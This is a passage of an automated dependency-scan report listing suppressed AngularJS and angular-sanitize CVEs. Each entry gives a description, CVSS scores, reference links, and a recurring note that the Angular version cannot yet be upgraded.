- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

[CVE-2022-25869](#) suppressed

All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSCORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

[CVE-2023-26116](#) suppressed



Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)

- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2qqx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

**CVE-2023-26118** suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

**CVE-2024-8372** suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing).

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*

[CVE-2024-8373](#) suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqmn-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*linux:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*vsphere:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*windows:\*.\*

#### **CVE-2025-2336 (RETIREJS)** suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYaXx/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

#### **CVE-2025-4690 (RETIREJS)** suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

#### **CVE-2025-0716 (RETIREJS)** suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

#### **End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS)** suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

#### References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

### remotegui.zip: angular-sanitize.jar: angular-sanitize.min.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular-sanitize.jar/META-INF/resources/webjars/angular-sanitize/1.8.3/angular-sanitize.min.js

**MD5:** f3c62abeec216e9431e7d5b22d8e813b

**SHA1:** 21355ef18c5e1ce2b2c711b9dba21cbea0655646

**SHA256:** cc80a30ad0439c2e9c209b3d7fcfb1d10e6007fd1d00c9cc144f393664a7045

**Referenced In Project/Scope:** server

#### Evidence



#### Suppressed Identifiers

- None

#### Suppressed Vulnerabilities



[CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPCSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>

- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPWSCSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCENTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:\*:\*:\*:\*:\*

#### [CVE-2024-21490](#) suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to `@angular/core` (<https://www.npmjs.com/package/@angular/core>).

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

#### [CVE-2022-25869](#) suppressed



All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN\\_LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

[CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)



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- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2gqx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

[CVE-2023-26118](#) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
